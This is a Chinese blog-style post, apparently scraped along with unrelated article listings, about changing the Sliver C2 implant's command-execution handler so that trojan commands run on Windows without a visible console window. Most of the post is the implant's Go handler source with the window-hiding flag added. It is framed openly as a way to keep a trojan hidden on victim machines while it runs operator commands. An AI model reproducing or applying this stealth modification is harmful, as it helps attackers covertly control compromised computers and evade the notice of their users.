向木马发出指令后, 如果是cmd命令会有一个黑窗口一闪而灭, 不利于木马隐藏, 需要将executeHandlerhandlers.go拷贝到handlers_windows.go里,核心代码为 cmd.SysProcAttr = &syscall.SysProcAttr{HideWindow: true}表示隐藏命令弹窗

func executeHandler(data []byte, resp RPCResponse) {

	var (

		err       error

		stdErr    io.Writer

		stdOut    io.Writer

		errWriter *bufio.Writer

		outWriter *bufio.Writer

	)

	execReq := &sliverpb.ExecuteReq{}

	err = proto.Unmarshal(data, execReq)

	if err != nil {

		// {{if .Config.Debug}}

		log.Printf("error decoding message: %v", err)

		// {{end}}

		return

	}

	execResp := &sliverpb.Execute{}

	exePath, err := expandPath(execReq.Path)

	if err != nil {

		execResp.Response = &commonpb.Response{

			Err: fmt.Sprintf("%s", err),

		}

		proto.Marshal(execResp)

		resp(data, err)

		return

	}

	cmd := exec.Command(exePath, execReq.Args...)

	cmd.SysProcAttr = &syscall.SysProcAttr{HideWindow: true}

	if execReq.Output {

		stdOutBuff := new(bytes.Buffer)

		stdErrBuff := new(bytes.Buffer)

		stdErr = stdErrBuff

		stdOut = stdOutBuff

		if execReq.Stderr != "" {

			stdErrFile, err := os.Create(execReq.Stderr)

			if err != nil {

				execResp.Response = &commonpb.Response{

					Err: fmt.Sprintf("%s", err),

				}

				proto.Marshal(execResp)

				resp(data, err)

				return

			}

			defer stdErrFile.Close()

			errWriter = bufio.NewWriter(stdErrFile)

			stdErr = io.MultiWriter(errWriter, stdErrBuff)

		}

		if execReq.Stdout != "" {

			stdOutFile, err := os.Create(execReq.Stdout)

			if err != nil {

				execResp.Response = &commonpb.Response{

					Err: fmt.Sprintf("%s", err),

				}

				proto.Marshal(execResp)

				resp(data, err)

				return

			}

			defer stdOutFile.Close()

			outWriter = bufio.NewWriter(stdOutFile)

			stdOut = io.MultiWriter(outWriter, stdOutBuff)

		}

		cmd.Stdout = stdOut

		cmd.Stderr = stdErr

		err := cmd.Run()

		//{{if .Config.Debug}}

		log.Printf("Exec (%v): %s", err, string(stdOutBuff.String()))

		//{{end}}

		if err != nil {

			// Exit errors are not a failure of the RPC, but of the command.

			if exiterr, ok := err.(*exec.ExitError); ok {

				execResp.Status = uint32(exiterr.ExitCode())

			} else {

				execResp.Response = &commonpb.Response{

					Err: fmt.Sprintf("%s", err),

				}

			}

		}

		if errWriter != nil {

			errWriter.Flush()

		}

		if outWriter != nil {

			outWriter.Flush()

		}

		execResp.Stderr = stdErrBuff.Bytes()

		execResp.Stdout = stdOutBuff.Bytes()

		if cmd.Process != nil {

			execResp.Pid = uint32(cmd.Process.Pid)

		}

	} else {

		err = cmd.Start()

		if err != nil {

			execResp.Response = &commonpb.Response{

				Err: fmt.Sprintf("%s", err),

			}

		}

		go func() {

			cmd.Wait()

		}()

		if cmd.Process != nil {

			execResp.Pid = uint32(cmd.Process.Pid)

		}

	}

	data, err = proto.Marshal(execResp)

	resp(data, err)

}

c2工具sliver 执行木马命令后会弹窗一闪而过的更多相关文章

  1. 使用 FileZilla FTP Client连接Vsftpd在执行LIST命令后提示连接超时

    使用 FileZilla FTP Client 连接 Vsftpd在执行LIST命令后提示连接超时. vi /etc/vsftpd/vsftpd.conf 添加: #开启被动模式 pasv_enabl ...

  2. 菜鸟调错(七)——控制台中执行mvn命令后提示‘cmd’不是内部或外部命令

    最近在cmd下使用mvn命令时,在执行完以后总会出现一句“‘cmd’不是内部或外部命令,也不是可执行程序或批处理文件”,如下图: 虽然命令执行成功了,不会有什么影响,但是身为强迫症晚期的我是绝对不能忍 ...

  3. linux执行python命令后permission denied

    linux下执行python后显示被拒绝问题定位: 1.检查下要执行的文件的权限是否存在执行权限,否则执行chmod命令赋予权限: 2.若赋予权限后仍然显示没有权限,检查下执行的python文件是否有 ...

  4. crt执行cat命令后乱码

    cat查看二进制文件后所有命令都乱码执行reset即可恢复

  5. 执行xcopy命令后出现Invalid num of parameters错误的解决办法

    作者:朱金灿 来源:http://blog.csdn.net/clever101 在执行一条批处理命令: xcopy /s /i /y C:\ppt D:\Program doc 开始很纳闷,上网一查 ...

  6. linux执行python命令后没有反应,不打印日志信息

    实际的python执行的软连接是路径是/opt/python2.7/bin/python,而设置的软连接错误如下: 修改该连接,是python指向/opt/python2.7/bin/python, ...

  7. [BAT] 执行xcopy命令后出现Invalid num of parameters错误的解决办法

    如果是Windows下的命令行,对于有空格的文件路径要加引号,对于xcopy命令就是源路径和目标路径都要加引号 xcopy "C:\ppt" "D:\Program do ...

  8. spark on yarn,client模式时,执行spark-submit命令后命令行日志和YARN AM日志

    [root@linux-node1 bin]# ./spark-submit \> --class com.kou.List2Hive \> --master yarn \> --d ...

  9. spark on yarn,cluster模式时,执行spark-submit命令后命令行日志和YARN AM日志

    [root@linux-node1 bin]# ./spark-submit \> --class com.kou.List2Hive \> --master yarn \> --d ...

  10. react+ant design 项目执行yarn run eject 命令后无法启动项目

    如何将内建配置全部暴露? 使用create-react-app结合antd搭建的项目中,项目目录没有该项目所有的内建配置, 1.执行yarn run eject 执行该命令后,运行项目yarn sta ...

随机推荐

  1. [转帖]/dev/random 和 /dev/urandom的一点备忘

    https://www.cnblogs.com/ohmygirl/p/random.html 1.  基本介绍 /dev/random和/dev/urandom是Linux系统中提供的随机伪设备,这两 ...

  2. [转帖]七. PostgreSQL逻辑结构(1)—数据库和模式

    https://www.jianshu.com/p/ee8b1bdfdb19 在PostgreSQL里,逻辑结构从高到底依次是:数据库.模式(又叫架构).表.行.当我们打开PostgreSQL官方自带 ...

  3. [转帖]使用 TiUP 升级 TiDB

    本文档适用于以下升级路径: 使用 TiUP 从 TiDB 4.0 版本升级至 TiDB 7.1. 使用 TiUP 从 TiDB 5.0-5.4 版本升级至 TiDB 7.1. 使用 TiUP 从 Ti ...

  4. [转帖]关于https://goproxy.cn,direct与https://proxy.golang.org的问题,国内无法访问https://proxy.golang.org设置了GOPROXY仍不可行

    关于https://goproxy.cn,direct与https://proxy.golang.org的问题,国内无法访问https://proxy.golang.org设置了GOPROXY仍不可行 ...

  5. [转帖]Tomcat maxKeepAliveRequests

    https://www.cnblogs.com/turn2i/p/10480088.html 在写这个问题前,其实我是为了分析项目碰到的一个tcp close wait问题.这个问题就不在这里讲了. ...

  6. [转帖]CentOS 7 下用 firewall-cmd / iptables 实现 NAT 转发供内网服务器联网

    https://www.cnblogs.com/hope250/p/8033818.html 自从用 HAProxy 对服务器做了负载均衡以后,感觉后端服务器真的没必要再配置并占用公网IP资源.而且由 ...

  7. [转帖]内存随机访问也比顺序慢,带你深入理解内存IO过程

    https://zhuanlan.zhihu.com/p/86513504 平时大家都知道内存访问很快,今天来让我们来思考两个问题: 问题1: 内存访问一次延时到底是多少?你是否会进行大概的估算? 例 ...

  8. Oracle数据库无法启动的简单处理

    1. 最近一台测试机器上面的Oracle数据库启动不起来了. 提示信息是UNDOTBS2的表空间找不到. 2. 然后可以使用 startup mount 简单开起来 但是发现还是无法使用. 3.本来想 ...

  9. 【图论】CF1508C Complete the MST

    Problem Link 有一张 \(n\) 个点的完全图,其中 \(m\) 条边已经标有边权.你需要给剩下的边都标上权值,使得所有边权的异或和为 \(0\),并且整张图的最小生成树边权和最小. \( ...

  10. 【小实验】使用 wrk 的 docker 容器来压测另一个容器

    作者:张富春(ahfuzhang),转载时请注明作者和引用链接,谢谢! cnblogs博客 zhihu Github 公众号:一本正经的瞎扯 GET 请求 想压测容器环境的服务性能,发现两个麻烦: 本 ...